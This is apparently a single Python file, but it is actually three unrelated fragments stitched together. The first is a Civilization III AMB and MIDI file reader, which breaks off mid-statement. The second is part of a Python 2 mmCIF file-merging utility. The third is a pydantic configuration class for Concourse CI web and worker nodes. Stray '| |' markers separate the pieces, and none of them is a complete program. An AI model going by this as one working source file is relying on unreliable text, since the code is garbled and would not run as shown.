### AMBReader.py is a script I've been using to explore & experiment with AMB files. In the process I've also built it up as an AMB reader, though
### it's by no means a user-friendly format-loading library.
### BASIC USAGE: First set civ3_root_dir below to your Civ 3 install directory. Then run the script in interactive mode (py -i AMBReader.py). It will
### automatically load all AMBs from your vanilla, PTW, and Conquests installs. You can look up an AMB by name using the "find_amb" method and print
### out its contents using its "describe" method. For example, try:
### >>> find_amb("TrebuchetRun").describe()
###
###
###
civ3_root_dir = "C:\\GOG Games\\Civilization III Complete\\"
import os
civ3_unit_art_paths = [os.path.join (civ3_root_dir , "Art", "Units"),
os.path.join (civ3_root_dir, "civ3PTW" , "Art", "Units"),
os.path.join (civ3_root_dir, "Conquests", "Art", "Units")]
def read_string (_file):
tr = b""
while True:
byte = _file.read (1)
if byte[0] != 0:
tr += byte
else:
break
return tr.decode ()
def read_amb_int (_file, unsigned = True):
return int.from_bytes (_file.read (4), byteorder = "little", signed = not unsigned)
def read_midi_int (_file, unsigned = True):
return int.from_bytes (_file.read (4), byteorder = "big", signed = not unsigned)
def read_midi_short (_file, unsigned = True):
return int.from_bytes (_file.read (2), byteorder = "big", signed = not unsigned)
# Reads a "variable length quantity", which is an int made up of a variable number of bytes. Each byte contains 7 bits of the int and the 8th
# (highest) bit determines whether or not the next byte is included as well.
def read_midi_var_int (_file):
tr = 0
while True:
bs = _file.read (1)
if len (bs) > 0:
tr = (tr << 7) + (bs[0] & 0x7F)
if (bs[0] & 0x80) == 0:
return tr
else:
raise Exception ("Unexpected EOF in variable length quantity")
# assert 0 == read_midi_var_int (b"\x00")
# assert 0x40 == read_midi_var_int (b"\x40")
# assert 0x7F == read_midi_var_int (b"\x7F")
# assert 0x80 == read_midi_var_int (b"\x81\x00")
# assert 0x2000 == read_midi_var_int (b"\xC0\x00")
# assert 0x3FFF == read_midi_var_int (b"\xFF\x7F")
# assert 0x4000 == read_midi_var_int (b"\x81\x80\x00")
# assert 0x100000 == read_midi_var_int (b"\xC0\x80\x00")
# assert 0x1FFFFF == read_midi_var_int (b"\xFF\xFF\x7F")
# assert 0x200000 == read_midi_var_int (b"\x81\x80\x80\x00")
# assert 0x8000000 == read_midi_var_int (b"\xC0\x80\x80\x00")
# assert 0xFFFFFFF == read_midi_var_int (b"\xFF\xFF\xFF\x7F")
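# Small helper (sketch) for exercising the commented-out asserts above:
# read_midi_var_int expects a file-like object, so raw byte strings are wrapped in
# io.BytesIO first.
import io
def read_midi_var_int_from_bytes (bs):
    return read_midi_var_int (io.BytesIO (bs))
# e.g.:
# assert 0x80 == read_midi_var_int_from_bytes (b"\x81\x00")
# assert 0xFFFFFFF == read_midi_var_int_from_bytes (b"\xFF\xFF\xFF\x7F")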
class Prgm:
def __init__ (self, amb_file):
# Size does not include the type tag or size field itself. The AMB reader code checks if size == 0x1C, implying it's possible for prgm chunks
# to have no strings, but in fact all prgm chunks in Civ 3 do have strings (at least the first prgm chunks in each file do).
self.size = read_amb_int (amb_file)
# PRGM chunk number, equals n where this is the n-th PRGM chunk in the file. There is ONE exception to this rule: in ChariotAttack.amb, the
# 8th PRGM chunk has number 5.
self.number = read_amb_int (amb_file)
# Observations about dat fields, by index:
# 0. One of [0, 1, 2, 3]. 3 is the most common
# 1. One of [0, 20, 100, 150, 200]. 200 is the most common. 20 occurs once, in PikemanAttackA.amb.
# 2. Looks like most values are negative
# 3. One of [0, 25, 127, 1237]. 1237 occurs once, in JaguarWarriorDeath.amb.
# 4. One of [0, 10, 127, 75, 785]. 75 is the most common.
# 1 & 2 are upper and lower bounds for randomized pitch/tempo. +/- 100 points corresponds to about +/- 6%.
self.dat = []
for n in range(5):
self.dat.append (read_amb_int (amb_file, unsigned = False))
if read_amb_int (amb_file) != 0xFA:
raise Exception ("Expected (0x FA 00 00 00) before strings in Prgm chunk in \"" + amb_file.name + "\"")
self.str1 = read_string (amb_file)
self.str2 = read_string (amb_file)
def describe (self):
print ("\tprgm\t" + "\t".join ([str (d) for d in self.dat]) + "\t'" + self.str1 + "' '" + self.str2 + "'")
class KmapItem:
def __init__ (self, amb_file, int2, int6):
if (int2 & 6) == 0: # False for all AMBs in Civ 3
self.Aint1 = read_amb_int (amb_file)
self.Aint2 = read_amb_int (amb_file)
else:
self.Bdat1 = amb_file.read (int6) # Always 0x (7F 00 00 00 00 00 00 00 01 00 00 00)
self.str1 = read_string (amb_file)
def get_description (self):
return str (self.Bdat1) + " '" + self.str1 + "'"
class Kmap:
def __init__ (self, amb_file):
self.size = read_amb_int (amb_file)
self.int2 = read_amb_int (amb_file) # flags? Equals 2 for all Kmap chunks in all files
self.int3 = read_amb_int (amb_file) # Always zero
self.int4 = read_amb_int (amb_file) # Always zero
self.str1 = read_string (amb_file)
self.int5 = read_amb_int (amb_file) # item count
if (self.int2 & 6) != 0: # True for all AMBs in Civ 3
self.int6 = read_amb_int (amb_file) # Always 12
else:
self.int6 = None
# In all Civ 3 AMBs, there are 3 chunks with 0 items and all the rest have 1 item
self.items = []
for n in range(self.int5):
self.items.append(KmapItem(amb_file, self.int2, self.int6))
if read_amb_int (amb_file) != 0xFA:
raise Exception ("Expected (0x FA 00 00 00) at end of Kmap chunk in \"" + amb_file.name + "\"")
def describe (self):
item_descriptions = [i.get_description () for i in self.items]
print ("\tkmap\t" + "{}\t{}\t{}\t'{}'\t{}\t{}\t{}".format (self.int2, self.int3, self.int4, self.str1, self.int5, self.int6, str (item_descriptions)))
class Glbl:
def __init__ (self, amb_file):
self.size = read_amb_int (amb_file)
tell0 = amb_file.tell()
self.int2 = read_amb_int (amb_file) # Always 12
self.dat1 = amb_file.read (self.int2) # Always 0x (00 00 00 00 00 00 00 00 CD CD CD CD)
# Dump the rest of the chunk into dat2 for now. The decompiled code to read the rest of the chunk is really weird and maybe corrupt.
# Dat2 is empty for all chunks in all files
self.dat2 = amb_file.read (self.size - (amb_file.tell() - tell0))
def describe (self):
print ("\tglbl\t" + str (self.int2) + "\t" + str (self.dat1) + "\t" + str (self.dat2))
class MidiTrackName:
def __init__ (self, midi_file, delta_time):
self.delta_time = delta_time
length = read_midi_var_int (midi_file)
self.name = midi_file.read (length).decode ("utf-8")
def describe (self, timestamp):
print ("\t\t\t{:01.3f}\tTrackName '{}'".format (timestamp, self.name))
class MidiSMPTEOffset:
def __init__ (self, midi_file, delta_time):
self.delta_time = delta_time
self.hr = int.from_bytes(midi_file.read (1), "big")
self.mn = int.from_bytes(midi_file.read (1), "big")
self.se = int.from_bytes(midi_file.read (1), "big")
self.fr = int.from_bytes(midi_file.read (1), "big")
self.ff = int.from_bytes(midi_file.read (1), "big")
def describe (self, timestamp):
contents = " ".join ([str(v) for v in [self.hr, self.mn, self.se, self.fr, self.ff]])
print ("\t\t\t{:01.3f}\tSMPTEOffset {}".format (timestamp, contents))
class MidiTimeSignature:
def __init__ (self, midi_file, delta_time):
self.delta_time = delta_time
self.nn = int.from_bytes(midi_file.read (1), "big")
self.dd = int.from_bytes(midi_file.read (1), "big")
self.cc = int.from_bytes(midi_file.read (1), "big")
self.bb = int.from_bytes(midi_file.read (1), "big")
def describe (self, timestamp):
contents = " ".join ([str(v) for v in [self.nn, self.dd, self.cc, self.bb]])
print ("\t\t\t{:01.3f}\tTimeSignature {}".format (timestamp, contents))
class MidiSetTempo:
def __init__ (self, midi_file, delta_time):
self.delta_time = delta_time
self.microseconds_per_quarter_note = int.from_bytes(midi_file.read (3), "big")
def describe (self, timestamp):
print ("\t\t\t{:01.3f}\tSetTempo {}".format (timestamp, self.microseconds_per_quarter_note))
class MidiEndOfTrack:
def __init__ (self, midi_file, delta_time):
self.delta_time = delta_time
def describe (self, timestamp):
print ("\t\t\t{:01.3f}\tEndOfTrack".format (timestamp))
def is_midi_meta_event (event):
t = type (event)
return (t == MidiTrackName) or (t == MidiSMPTEOffset) or (t == MidiTimeSignature) or (t == MidiSetTempo) or (t == MidiEndOfTrack)
class MidiControlChange:
def __init__ (self, midi_file, delta_time, event_byte):
self.delta_time = delta_time
self.channel_number = int.from_bytes (event_byte, "big") & 0xF
self.controller_number = int.from_bytes (midi_file.read (1), "big")
if self.controller_number >= 122:
raise Exception ("This is actually a channel mode message")
self.value = int.from_bytes (midi_file.read (1), "big")
def describe (self, timestamp):
print ("\t\t\t{:01.3f}\tControlChange {} {} {}".format (timestamp, self.channel_number, self.controller_number, self.value))
class MidiProgramChange:
def __init__ (self, midi_file, delta_time, event_byte):
self.delta_time = delta_time
self.channel_number = int.from_bytes (event_byte, "big") & 0xF
self.program_number = int.from_bytes (midi_file.read (1), "big")
def describe (self, timestamp):
print ("\t\t\t{:01.3f}\tProgramChange {} {}".format (timestamp, self.channel_number, self.program_number))
class MidiNoteOff:
def __init__ (self, midi_file, delta_time, event_byte):
self.delta_time = delta_time
self.channel_number = int.from_bytes (event_byte, "big") & 0xF
self.key = int.from_bytes (midi_file.read (1), "big")
self.velocity = int.from_bytes (midi_file.read (1), "big")
def describe (self, timestamp):
print ("\t\t\t{:01.3f}\tNoteOff {} {} {}".format (timestamp, self.channel_number, self.key, self.velocity))
class MidiNoteOn:
def __init__ (self, midi_file, delta_time, event_byte):
self.delta_time = delta_time
self.channel_number = int.from_bytes (event_byte, "big") & 0xF
self.key = int.from_bytes (midi_file.read (1), "big")
self.velocity = int.from_bytes (midi_file.read (1), "big")
def describe (self, timestamp):
print | |
if column not in cif_table.columns:
continue
try:
ctx = self.cif_data[table_name]
except KeyError:
continue
## dictionary of [primary_key_value] = cif_row
primary_values = {}
for crx in ctx:
try:
value = crx[column]
except KeyError:
pass
else:
primary_values[value] = crx
for cif_row in cif_table:
try:
value = cif_row[column]
crx = primary_values[value]
except KeyError:
continue
self.log("%s: file primary value %s=%s conflicts with "\
"merged values" % (cif_data.file.path, tag, value))
## check cif_row with crx, if cif_row has no conflicting
## column values, then the row will cleanly merge in
## and nothing needs to be done
will_merge = True
for (col, val) in cif_row.items():
if col not in crx:
continue
if crx[col] != val:
will_merge = False
break
if will_merge == True:
continue
## after a lot of thought, this seems to make sense
prefix = cif_table.data.file.path.replace(".","_")
new_value = "%s%s" % (prefix, value)
self.change_root_value(
cif_data, table_name, column, value, new_value)
def create_unused_primary_key(self, table_name, primary_column):
"""Assume primary keys are numeric, return the lowest unused
primary key in the cif_table.
"""
try:
ctx = self.cif_data[table_name]
except KeyError:
return "1"
else:
primary_keys = self.get_column_values(ctx, primary_column)
new_key = 1
while str(new_key) in primary_keys:
new_key += 1
return str(new_key)
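# Example: if the table already contains primary key values {"1", "2", "4"},
# create_unused_primary_key returns "3", the lowest unused numeric key as a string.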
def make_comare_accelerator(self, cif_row, columns):
"""Returns a tuple of the values in cif_row in the order of columns.
For rows which do not have data for a column, the special class
Any() is created which compares True against any value.
merge_accel: (cif_row[column1], cif_row[column2], ...)
"""
merge_accel = []
for column in columns:
merge_accel.append(cif_row.get(column, Any()))
## last item is a special Any() with a reference to the row
any = Any()
any.cif_row = cif_row
merge_accel.append(any)
return tuple(merge_accel)
def do_cif_row_merge(self, crx, cif_row, columns):
"""Merge the given columns of cif_row2 into cif_row1.
"""
log_merged_columns = []
for column in columns:
value = crx.get(column)
if value == None or value == "" or value == "?" or value == ".":
try:
crx[column] = cif_row[column]
except KeyError:
pass
else:
log_merged_columns.append(column)
if column not in crx.table.columns:
crx.table.columns.append(column)
## log what happened, return
if len(log_merged_columns) > 0:
i = crx.table.index(crx)
self.log("%s: merged columns=%s into existing row=%d" % (
crx.table.name, string.join(log_merged_columns, ","), i))
else:
i1 = crx.table.index(crx)
i2 = cif_row.table.index(cif_row)
self.log("%s: table %s duplicate row=%d file row=%d" % (
cif_row.table.data.file.path, crx.table.name, i1, i2))
def merge_cif_row(self, ctx, cif_row, columns):
"""Adds the cif_row to the cif_table after checking to see if the
row is a duplicate, or a near duplicate with extra columns. If
the cif_row matches a cif_row already in the cif_table, only the
new columns are merged into the existing row. Returns 1 if the
row was appended to the table, and returns 0 if the row values were
merged, or if the row was an exact match with an existing row.
"""
merge_accel = self.make_comare_accelerator(cif_row, columns)
match_found = False
for accel in self.merge_accel_list:
if accel == merge_accel:
match_found = True
break
if match_found == True:
## CASE 1
## there is a row which matches this row already in the table
## merge any extra columns of data this row may have into
## the matching row
crx = accel[-1].cif_row
self.do_cif_row_merge(crx, cif_row, columns)
self.merge_accel_list.remove(accel)
accel = self.make_comare_accelerator(crx, columns)
self.merge_accel_list.append(accel)
return 0
else:
## CASE 2:
## if we get here, then the row does not match any
## other row and should be appended
crx = copy.deepcopy(cif_row)
ctx.append(crx)
accel = self.make_comare_accelerator(crx, columns)
self.merge_accel_list.append(accel)
return 1
def merge_cif_table(self, cif_table, columns):
"""Merge the given columns of the cif_table.
"""
## the accelerator must be blanked for each new table
## to be merged
self.merge_accel_list = []
try:
ctx = self.cif_data[cif_table.name]
except KeyError:
## create new table if necessary
ctx = mmCIFTable(cif_table.name, copy.deepcopy(cif_table.columns))
self.cif_data.append(ctx)
self.log("%s: adding new table %s" % (
cif_table.data.file.path, cif_table.name))
else:
## fill the merge accelerator list and dictionary
## for the row merge
for crx in ctx:
accel = self.make_comare_accelerator(crx, columns)
self.merge_accel_list.append(accel)
num = 0
for cif_row in cif_table:
num += self.merge_cif_row(ctx, cif_row, columns)
self.log("%s: added %d rows into table %s" % (
cif_table.data.file.path, num, cif_table.name))
def merge_cif_data(self, cif_data):
"""Merge the cif_data block.
"""
## Before merging, remove any blank values from the cif_data
## block
self.remove_blank_values(cif_data)
## Before merging a cif_data block, it needs have tables
## with linked data fully filled in to avoid accidental
## data overlaps when merging with other files
self.add_parent_values(cif_data)
## Before merging a cif_data block, it must be scanned for
## tables with primary key conflicts with tables already in
## the merged files. Any primary keys which confict must be
## changed to a new value before the merge.
self.resolve_cif_data_conflicts(cif_data)
## merge the tables
for cif_table in cif_data:
columns = copy.deepcopy(cif_table.columns)
self.merge_cif_table(cif_table, columns)
## </merge utility methods>
## <API CALLS>
def merge_cif_file(self, cif_file, data_list = None):
"""Merge the cif_file. If a data_list is given, only merge
the data sections in the list, otherwise merge all data
sections in the cif_file.
"""
for cif_data in cif_file:
if data_list and cif_data.name not in data_list:
continue
self.merge_cif_data(cif_data)
def post_process(self):
"""Called after all cif_files have been merged, this method
post-processes the merged file.
"""
for cif_table in self.cif_data:
cif_table.autoset_columns()
self.sort_columns(cif_table)
## </API CALLS>
class UsageException(Exception):
def __init__(self, text):
self.text = text
def __str__(self):
return "Invalid Argument: %s" % (self.text)
def usage():
print 'cifmerge.py - A utility for intelligent merging and manipulation of'
print ' mmCIF files by utilizing linked data definitions'
print ' found in mmCIF dictionaries.'
print
print 'usage: cifmerge.py [-s "table.column=old:new"]'
print ' [-u "table.column=old:new"]'
print ' [-d mmCIF dictionary_filename]'
print ' [-f merge_filename]'
print ' [-n data_name]'
print ' OUTPUT_CIF_FILENAME'
print
print ' -h,-?'
print ' Prints this help page.'
print
print ' -s table.column=old:new'
print ' Changes the value of a row in table.column from old to'
print ' new, and then changes all linked child values of that'
print ' table.column according to the loaded mmCIF dictionaries.'
print
print ' -u table.column=old:new'
print ' Uber-alles value change. This reduces table to a one row'
print ' table with only the value new. If an old value is given,'
print ' any other columns of data in the row will be preserved.'
print ' All linked data items found in the mmCIF dictionaries'
print ' in the entire file are then changed to value new.'
print
print ' -d dictionary_filename'
print ' Specifies a mmCIF dictionary to use. Dictionaries are'
print ' necessary for the correct merging of tables with linked'
print ' values.'
print
print ' -f merge_filename'
print ' A mmCIF file to merge. Use multiple times to merge'
print ' multiple files.'
print
print ' -n name'
print ' Give the output mmCIF file data the argument name. If'
print ' no name is specified, XXXX is used.'
print
raise SystemExit
def decode_change_arg(change_arg):
"""Decodes the string:table.column=old:new into:(table, column, old, new).
"""
ieq = change_arg.find("=")
if ieq == -1:
return None
table_name_column = change_arg[:ieq].strip()
try:
table_name, column = table_name_column.split(".")
except ValueError:
raise UsageException(change_arg)
old_new = change_arg[ieq+1:].strip()
if old_new[0] == "'" or old_new[0] == '"':
quote = old_new[0]
else:
quote = None
if quote == None:
try:
old, new = old_new.split(":")
except ValueError:
raise UsageException(change_arg)
old = old.strip()
new = new.strip()
else:
old_new = old_new[1:-1]
try:
old, new = old_new.split("%s:%s" % (quote, quote))
except ValueError:
raise UsageException(change_arg)
return table_name, column, old, new
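# Examples (illustrative table/column names only):
#   decode_change_arg("entity.id=1:2") returns ("entity", "id", "1", "2")
#   decode_change_arg("entity.id='A 1':'B 2'") returns ("entity", "id", "A 1", "B 2"),
#   the quoted form being split at quote + ":" + quote.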
def main():
## parse options
(opts, args) = getopt.getopt(sys.argv[1:], "h?u:s:d:f:n:")
s_arg_list = []
u_arg_list = []
d_arg_list = []
f_arg_list = []
n_arg = None
output_file = None
for (opt, item) in opts:
if opt == "-h" or opt == "-?":
usage()
elif opt == "-s":
s_arg_list.append(decode_change_arg(item))
elif opt == "-u":
u_arg_list.append(decode_change_arg(item))
elif opt == "-d":
d_arg_list.append(item)
elif opt == "-f":
f_arg_list.append(item)
elif opt == "-n":
n_arg = item
if len(args) != 1:
raise UsageException("One output file path required.")
output_path = args[0]
## create validator and load dictionaries
validator = mmCIFValidator()
for path in d_arg_list:
sys.stderr.write("[LOADING DICTIONARY] %s\n" % (path))
validator.load_dictionary(path)
| |
key, used to sign auth tokens.",
)
streaming_artifacts_compression: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_STREAMING_ARTIFACTS_COMPRESSION",
description="Compression algorithm for internal streaming. (default: gzip)",
)
syslog_address: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_SYSLOG_ADDRESS",
description="Remote syslog server address with port (Example: 0.0.0.0:514).",
)
syslog_ca_cert: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_SYSLOG_CA_CERT",
description="Paths to PEM_encoded CA cert files to use to verify the Syslog server SSL cert.",
)
syslog_drain_interval: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_SYSLOG_DRAIN_INTERVAL",
description="Interval over which checking is done for new build logs to send to syslog server (duration measurement units are s/m/h; eg. 30s/30m/1h) (default: 30s)",
)
syslog_hostname: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_SYSLOG_HOSTNAME",
description="Client hostname with which the build logs will be sent to the syslog server. (default: atc_syslog_drainer)",
)
syslog_transport: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_SYSLOG_TRANSPORT",
description="Transport protocol for syslog messages (Currently supporting tcp, udp & tls).",
)
system_claim_key: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_SYSTEM_CLAIM_KEY",
description="The token claim key to use when matching system_claim_values (default: aud)",
)
system_claim_value: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_SYSTEM_CLAIM_VALUE",
description="Configure which token requests should be considered 'system' requests. (default: concourse_worker)",
)
tls_bind_port: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TLS_BIND_PORT",
description="Port on which to listen for HTTPS traffic.",
)
tls_ca_cert: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TLS_CA_CERT",
description="File containing the client CA certificate, enables mTLS",
)
tls_cert: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TLS_CERT",
description="File containing an SSL certificate.",
)
tls_key: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TLS_KEY",
description="File containing an RSA private key, used to encrypt HTTPS traffic.",
)
tracing_attribute: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_ATTRIBUTE",
description="attributes to attach to traces as metadata",
)
tracing_honeycomb_api_key: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_HONEYCOMB_API_KEY",
description="honeycomb.io api key",
)
tracing_honeycomb_dataset: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_HONEYCOMB_DATASET",
description="honeycomb.io dataset name",
)
tracing_honeycomb_service_name: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_HONEYCOMB_SERVICE_NAME",
description="honeycomb.io service name (default: concourse)",
)
tracing_jaeger_endpoint: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_JAEGER_ENDPOINT",
description="jaeger http_based thrift collector",
)
tracing_jaeger_service: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_JAEGER_SERVICE",
description="jaeger process service name (default: web)",
)
tracing_jaeger_tags: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_JAEGER_TAGS",
description="tags to add to the components",
)
tracing_otlp_address: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_OTLP_ADDRESS",
description="otlp address to send traces to",
)
tracing_otlp_header: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_OTLP_HEADER",
description="headers to attach to each tracing message",
)
tracing_otlp_use_tls: Optional[bool] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_OTLP_USE_TLS",
description="whether to use tls or not",
)
tracing_service_name: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_SERVICE_NAME",
description="service name to attach to traces as metadata (default: concourse_web)",
)
tracing_stackdriver_projectid: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_STACKDRIVER_PROJECTID",
description="GCP's Project ID",
)
tsa_atc_url: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_ATC_URL",
description="ATC API endpoints to which workers will be registered.",
)
tsa_authorized_keys: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_AUTHORIZED_KEYS",
description="Path to file containing keys to authorize, in SSH authorized_keys format (one public key per line).",
)
tsa_bind_ip: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_BIND_IP",
description="IP address on which to listen for SSH. (default: 0.0.0.0)",
)
tsa_bind_port: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_BIND_PORT",
description="Port on which to listen for SSH. (default: 2222)",
)
tsa_client_id: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_CLIENT_ID",
description="Client used to fetch a token from the auth server. NOTE: if you change this value you will also need to change the __system_claim_value flag so the atc knows to allow requests from this client. (default: concourse_worker)",
)
tsa_client_secret: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_CLIENT_SECRET",
description="Client used to fetch a token from the auth server",
)
tsa_cluster_name: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_CLUSTER_NAME",
description="A name for this Concourse cluster, to be displayed on the dashboard page.",
)
tsa_debug_bind_ip: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_DEBUG_BIND_IP",
description="IP address on which to listen for the pprof debugger endpoints. (default: 127.0.0.1)",
)
tsa_debug_bind_port: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_DEBUG_BIND_PORT",
description="Port on which to listen for the pprof debugger endpoints. (default: 2221)",
)
tsa_garden_request_timeout: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_GARDEN_REQUEST_TIMEOUT",
description="How long to wait for requests to Garden to complete. 0 means no timeout. (default: 5m)",
)
tsa_heartbeat_interval: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_HEARTBEAT_INTERVAL",
description="interval on which to heartbeat workers to the ATC (default: 30s)",
)
tsa_host_key: Optional[str] = None
tsa_host_key_path: Path = Field(
Path("/etc/concourse/tsa_host_key"),
concourse_env_var="CONCOURSE_TSA_HOST_KEY",
description="Path to private key to use for the SSH server.",
)
tsa_log_cluster_name: Optional[bool] = Field(
None,
concourse_env_var="CONCOURSE_TSA_LOG_CLUSTER_NAME",
description="Log cluster name.",
)
tsa_log_level: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_LOG_LEVEL",
description="Minimum level of logs to see. (default: info)",
)
tsa_peer_address: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_PEER_ADDRESS",
description="Network address of this web node, reachable by other web nodes. Used for forwarded worker addresses. (default: 127.0.0.1)",
)
tsa_scope: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_SCOPE",
description="Scopes to request from the auth server",
)
tsa_team_authorized_keys: Optional[Path] = Field(
None,
concourse_env_var="CONCOURSE_TSA_TEAM_AUTHORIZED_KEYS",
description="Path to file containing keys to authorize, in SSH authorized_keys format (one public key per line).",
)
tsa_team_authorized_keys_file: Optional[Path] = Field(
None,
concourse_env_var="CONCOURSE_TSA_TEAM_AUTHORIZED_KEYS_FILE",
description="Path to file containing a YAML array of teams and their authorized SSH keys, e.g. [{team:foo,ssh_keys:[key1,key2]}].",
)
tsa_token_url: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_TOKEN_URL",
description="Token endpoint of the auth server",
)
vault_auth_backend: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_AUTH_BACKEND",
description="Auth backend to use for logging in to Vault.",
)
vault_auth_backend_max_ttl: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_AUTH_BACKEND_MAX_TTL",
description="Time after which to force a re_login. If not set, the token will just be continuously renewed.",
)
vault_auth_param: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_AUTH_PARAM",
description="Parameter to pass when logging in via the backend. Can be specified multiple times.",
)
vault_ca_cert: Optional[Path] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_CA_CERT",
description="Path to a PEM_encoded CA cert file to use to verify the vault server SSL cert.",
)
vault_ca_path: Optional[Path] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_CA_PATH",
description="Path to a directory of PEM_encoded CA cert files to verify the vault server SSL cert.",
)
vault_client_cert: Optional[Path] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_CLIENT_CERT",
description="Path to the client certificate for Vault authorization.",
)
vault_client_key: Optional[Path] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_CLIENT_KEY",
description="Path to the client private key for Vault authorization.",
)
vault_client_token: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_CLIENT_TOKEN",
description="Client token for accessing secrets within the Vault server.",
)
vault_insecure_skip_verify: Optional[bool] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_INSECURE_SKIP_VERIFY",
description="Enable insecure SSL verification.",
)
vault_login_timeout: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_LOGIN_TIMEOUT",
description="Timeout value for Vault login. (default: 60s)",
)
vault_lookup_templates: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_LOOKUP_TEMPLATES",
description="Path templates for credential lookup (default: /{{.Team}}/{{.Pipeline}}/{{.Secret}}, /{{.Team}}/{{.Secret}})",
)
vault_namespace: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_NAMESPACE",
description="Vault namespace to use for authentication and secret lookup.",
)
vault_path_prefix: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_PATH_PREFIX",
description="Path under which to namespace credential lookup. (default: /concourse)",
)
vault_query_timeout: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_QUERY_TIMEOUT",
description="Timeout value for Vault query. (default: 60s)",
)
vault_retry_initial: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_RETRY_INITIAL",
description="The initial time between retries when logging in or re_authing a secret. (default: 1s)",
)
vault_retry_max: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_RETRY_MAX",
description="The maximum time between retries when logging in or re_authing a secret. (default: 5m)",
)
vault_server_name: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_SERVER_NAME",
description="If set, is used to set the SNI host when connecting via TLS.",
)
vault_shared_path: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_SHARED_PATH",
description="Path under which to lookup shared credentials.",
)
vault_url: Optional[str] = Field(
"https://active.vault.service.consul:8200",
concourse_env_var="CONCOURSE_VAULT_URL",
description="Vault server address used to access secrets.",
)
web_public_dir: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_WEB_PUBLIC_DIR",
description="Web public/ directory to serve live for local development.",
)
class Config: # noqa: WPS431
env_prefix = "concourse_web_"
arbitrary_types_allowed = True
@validator("encryption_key")
def validate_encryption_key_length(cls, encryption_key): # noqa: N805
if len(encryption_key) != CONCOURSE_ENCRYPTION_KEY_REQUIRED_LENGTH:
raise ValueError(
"Encryption key is not the correct length. "
"It needs to be a 32 byte random string."
)
return encryption_key
@property
def local_user(self):
password_value = self.admin_password.get_secret_value()
return f"{self.admin_user}:{password_value}"
def concourse_env(self) -> Dict[str, str]:
concourse_env_dict = super().concourse_env()
concourse_env_dict["CONCOURSE_ADD_LOCAL_USER"] = self.local_user
return concourse_env_dict
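    # Illustrative note (not part of the original source): for a hypothetical
    # instance configured with admin_user="admin" and a 32-byte admin_password,
    # concourse_env() returns the base environment from the parent class plus
    #
    #   CONCOURSE_ADD_LOCAL_USER=admin:<admin password value>
    #
    # since local_user simply joins the admin username and password with a colon.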
class ConcourseWorkerConfig(ConcourseBaseConfig):
_node_type: str = "worker"
user: str = "root"
baggageclaim_bind_ip: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_BAGGAGECLAIM_BIND_IP",
description="IP address on which to listen for API traffic. "
"(default: 127.0.0.1)",
)
baggageclaim_bind_port: Optional[int] = Field(
None,
concourse_env_var="CONCOURSE_BAGGAGECLAIM_BIND_PORT",
description="Port on which to listen for API traffic. (default: 7788)",
)
baggageclaim_btrfs_binary: Optional[Path] = Field(
None,
concourse_env_var="CONCOURSE_BAGGAGECLAIM_BTRFS_BIN",
description="Path to btrfs binary (default: btrfs)",
)
baggageclaim_debug_bind_ip: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_BAGGAGECLAIM_DEBUG_BIND_IP",
description="IP address on which to listen for the pprof debugger endpoints. "
"(default: 127.0.0.1)",
)
